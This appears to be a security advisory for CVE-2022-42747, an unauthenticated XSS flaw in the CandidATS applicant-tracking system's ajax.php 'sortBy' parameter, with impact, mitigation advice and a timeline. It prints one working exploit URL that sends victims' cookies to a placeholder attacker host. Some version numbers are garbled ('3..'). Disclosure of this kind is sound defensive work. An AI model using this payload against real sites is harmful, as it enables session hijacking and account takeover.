CVE-2022-42747: Unauthenticated XSS Vulnerability in CandidATS 3.. through 'sortBy' of the 'ajax.php' Resource

A critical security vulnerability has been identified in CandidATS version 3... This vulnerability (CVE-2022-42747) allows an unauthenticated external attacker to steal the cookie of arbitrary users through the 'sortBy' field of the 'ajax.php' resource. The application does not properly validate user input against Cross-site Scripting (XSS) attacks, which allows attackers to execute arbitrary JavaScript code in the context of the user's browser.

Impact

The exploitation of this vulnerability could lead to the theft of sensitive user information, including session cookies or other authentication data. In a worst-case scenario, an attacker might use this vulnerability to hijack the session of a privileged user, such as an administrator, and gain complete control over the affected application.

Details

The vulnerability exists in the 'sortBy' parameter of the 'ajax.php' resource. By injecting a malicious payload into the sortBy field, an attacker can cause the affected page to execute JavaScript code within the user's browser.

The following code snippet demonstrates how the vulnerability can be exploited

http://example.com/candidats/ajax.php?m=office_data&a=sortColumns&sortBy=<script>document.location='http://attacker.com/cookie_stealer.php?cookie='+document.cookie;</script>&sortColumns=array()

In this example, the injected payload is a JavaScript code that makes a request to the attacking server with the user's cookie as a query string parameter. Once the attacker's server receives the cookie, they can use it to impersonate the victim in the CandidATS application.

Mitigation

To mitigate the risk associated with this vulnerability, users of CandidATS should immediately update their installation to the latest version. If the update is not feasible, administrators can implement the following workaround:

Modify the 'ajax.php' file and apply proper input validation to the 'sortBy' parameter.

2. Use a Content Security Policy (CSP) header to restrict the execution of JavaScript code from untrusted sources.

Additionally, users should be educated on the potential risks associated with clicking on suspicious links or opening unknown emails.

More information about CVE-2022-42747 can be found in the official CVE database

- CVE-2022-42747

Conclusion

CVE-2022-42747 is a critical XSS vulnerability affecting CandidATS 3.., and its exploitation can lead to sensitive information disclosure and session hijacking. Users of this version are highly encouraged to apply the necessary updates or workarounds to prevent potential attacks.

It is essential for developers to carefully validate all user input and maintain good security practices in application development. By minimizing the risk of vulnerabilities such as this, users can enjoy a safe and secure application experience.

Timeline

Published on: 11/03/2022 20:15:00 UTC
Last modified on: 01/26/2023 20:20:00 UTC